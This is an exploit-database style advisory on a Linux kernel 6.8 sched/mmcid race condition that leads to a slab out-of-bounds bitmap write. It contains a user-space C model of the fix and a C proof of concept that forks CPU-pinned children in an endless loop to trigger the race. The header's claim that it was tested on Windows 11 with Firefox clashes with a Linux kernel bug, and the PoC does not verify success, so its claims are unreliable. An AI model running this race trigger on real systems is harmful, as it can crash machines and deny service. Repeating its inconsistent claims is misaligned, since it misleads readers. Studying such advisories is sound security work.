=============================================================================================================================================
| # Title : Linux Kernel 6.8 sched/mmcid Race Condition Leading to Slab Out-of-Bounds Access |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : System built‑in component |
=============================================================================================================================================

[+] Summary :

A race condition in the sched/mmcid subsystem of the Linux kernel could lead to an out-of-bounds bitmap access during a mode transition between per-CPU and per-task CID management. The issue occurs when a task exits while still marked with the MM_CID_TRANSIT flag (bit 29). In affected kernels, sched_mm_cid_exit() incorrectly assumes that the CID is owned by the CPU and invokes mm_drop_cid_on_cpu() without validating actual ownership. This may result in an invalid clear_bit() operation that uses the TRANSIT bit value as a CID index, causing a slab out-of-bounds access. Although initially reported as a use-after-free by KASAN, the root cause is an out-of-bounds bitmap write triggered by improper state validation during CID cleanup.

[+] The vulnerability can potentially lead to :

- Kernel memory corruption
- System instability or crash
- Local denial-of-service
- Possible local privilege escalation under highly constrained race conditions

The issue has been resolved by adding explicit validation in mm_drop_cid_on_cpu() to ensure that the CID is actually CPU-owned before clearing bitmap bits.

[+] Affected Versions :

Linux kernel versions starting from 6.8 (when per-CPU MM CID management was introduced) up to the release containing the upstream fix.
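The defect class described in the summary, a value that still carries a state flag being handed to clear_bit() as an index, can be modelled in user space. The following is an added example written for this page; it is not the advisory's PoC and not Linux kernel code. The bitmap layout, the drop_result enum and the 256-CID bound are illustrative assumptions; only the MM_CID_TRANSIT bit value comes from the advisory. The checked drop_cid_on_cpu() mirrors the fix the advisory describes (reject values that are not CPU-owned before touching the bitmap), and unchecked_clear_bit_offset() computes, without performing it, where the pre-fix write would land.

```c
/* User-space model of the bug class above: a value still carrying a state flag
 * (MM_CID_TRANSIT, bit 29) is used as a bitmap index. Added example; not the
 * advisory's PoC and not kernel code. Bitmap layout, enum and bound are assumed. */
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>

#define MM_CID_TRANSIT (1U << 29)                 /* flag bit named in the advisory */
#define BITS_PER_LONG  (8 * sizeof(unsigned long))

struct cid_bitmap {
    unsigned long *bits;   /* one bit per CID */
    unsigned int nr_cids;  /* number of valid CID indices, i.e. the bound */
};

enum drop_result { DROP_CLEARED, DROP_NOT_CPU_OWNED, DROP_OUT_OF_RANGE };

/* Size in bytes of the allocation backing an nr_cids-bit bitmap. */
static size_t cid_bitmap_bytes(unsigned int nr_cids)
{
    return ((nr_cids + BITS_PER_LONG - 1) / BITS_PER_LONG) * sizeof(unsigned long);
}

static struct cid_bitmap *cid_bitmap_alloc(unsigned int nr_cids)
{
    struct cid_bitmap *bm = calloc(1, sizeof(*bm));
    if (!bm)
        return NULL;
    bm->bits = calloc(1, cid_bitmap_bytes(nr_cids));
    if (!bm->bits) {
        free(bm);
        return NULL;
    }
    bm->nr_cids = nr_cids;
    return bm;
}

static void cid_bitmap_free(struct cid_bitmap *bm)
{
    if (bm) {
        free(bm->bits);
        free(bm);
    }
}

/* Mark a CID as allocated; refuses indices outside the bitmap. */
static bool cid_set(struct cid_bitmap *bm, unsigned int cid)
{
    if (cid >= bm->nr_cids)
        return false;
    bm->bits[cid / BITS_PER_LONG] |= 1UL << (cid % BITS_PER_LONG);
    return true;
}

static bool cid_test(const struct cid_bitmap *bm, unsigned int cid)
{
    if (cid >= bm->nr_cids)
        return false;
    return (bm->bits[cid / BITS_PER_LONG] >> (cid % BITS_PER_LONG)) & 1UL;
}

/* Byte offset from the start of the bitmap that an unchecked clear_bit(value)
 * would write to. Computed, never performed, so this model stays in bounds;
 * compare with cid_bitmap_bytes() to see how far a TRANSIT-tagged value lands
 * outside the allocation. */
static size_t unchecked_clear_bit_offset(unsigned int value)
{
    return (value / BITS_PER_LONG) * sizeof(unsigned long);
}

/* Checked drop, mirroring the fix described in the advisory: a value still
 * carrying MM_CID_TRANSIT is not CPU-owned and is rejected before it can be
 * used as an index; the range check covers any other stale value. */
static enum drop_result drop_cid_on_cpu(struct cid_bitmap *bm, unsigned int cid_value)
{
    if (cid_value & MM_CID_TRANSIT)
        return DROP_NOT_CPU_OWNED;
    if (cid_value >= bm->nr_cids)
        return DROP_OUT_OF_RANGE;
    bm->bits[cid_value / BITS_PER_LONG] &= ~(1UL << (cid_value % BITS_PER_LONG));
    return DROP_CLEARED;
}

/* Walks the exit-time scenario on a 256-CID bitmap and returns how many of the
 * five expected outcomes held (5 means the validation behaves as intended). */
static int model_check(void)
{
    struct cid_bitmap *bm = cid_bitmap_alloc(256);
    int ok = 0;
    if (!bm)
        return 0;
    ok += cid_set(bm, 7);
    /* Task exiting with TRANSIT still set: the bitmap must not be touched. */
    ok += drop_cid_on_cpu(bm, 7 | MM_CID_TRANSIT) == DROP_NOT_CPU_OWNED;
    ok += cid_test(bm, 7);
    /* The genuinely CPU-owned CID is released normally. */
    ok += drop_cid_on_cpu(bm, 7) == DROP_CLEARED;
    ok += !cid_test(bm, 7);
    cid_bitmap_free(bm);
    return ok;
}

int main(void)
{
    printf("model checks passed: %d/5\n", model_check());
    printf("unchecked clear_bit(7 | TRANSIT) offset: %zu bytes, bitmap size: %zu bytes\n",
           unchecked_clear_bit_offset(7 | MM_CID_TRANSIT), cid_bitmap_bytes(256));
    return 0;
}
```

The point of the model is the ordering in drop_cid_on_cpu(): ownership (flag) validation first, then the range check, and only then the bitmap write. On a 64-bit build the unchecked offset for a TRANSIT-tagged value is 64 MiB past the start of a 32-byte bitmap, which is why a stale flag bit surfaces as a slab out-of-bounds write rather than a wrong-CID release.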
[+] POC :

#define _GNU_SOURCE
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

#define MM_CID_TRANSIT (1U << 29)

/* Pin the calling process to a single CPU. */
void setup_affinity(int cpu)
{
    cpu_set_t mask;
    CPU_ZERO(&mask);
    CPU_SET(cpu, &mask);
    sched_setaffinity(0, sizeof(mask), &mask);
}

/* Fork short-lived children spread across all online CPUs so that tasks
   exit while a CID mode transition may be in progress. */
void trigger_transit_leak()
{
    for (int i = 0; i < 100; i++) {
        pid_t pid = fork();
        if (pid < 0)
            exit(1);
        if (pid == 0) {
            setup_affinity(i % sysconf(_SC_NPROCESSORS_ONLN));
            usleep(5);
            exit(0);
        }
    }
}

int main()
{
    printf("[*] Starting simulation of mmcid (Out-of-Bounds) vulnerability exploitation...\n");
    printf("[*] Note: Success depends on triggering a Race Condition within the kernel.\n");
    while (1) {
        trigger_transit_leak();
        /* Reap every exited child before the next round. */
        while (waitpid(-1, NULL, WNOHANG) > 0)
            ;
    }
    return 0;
}

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================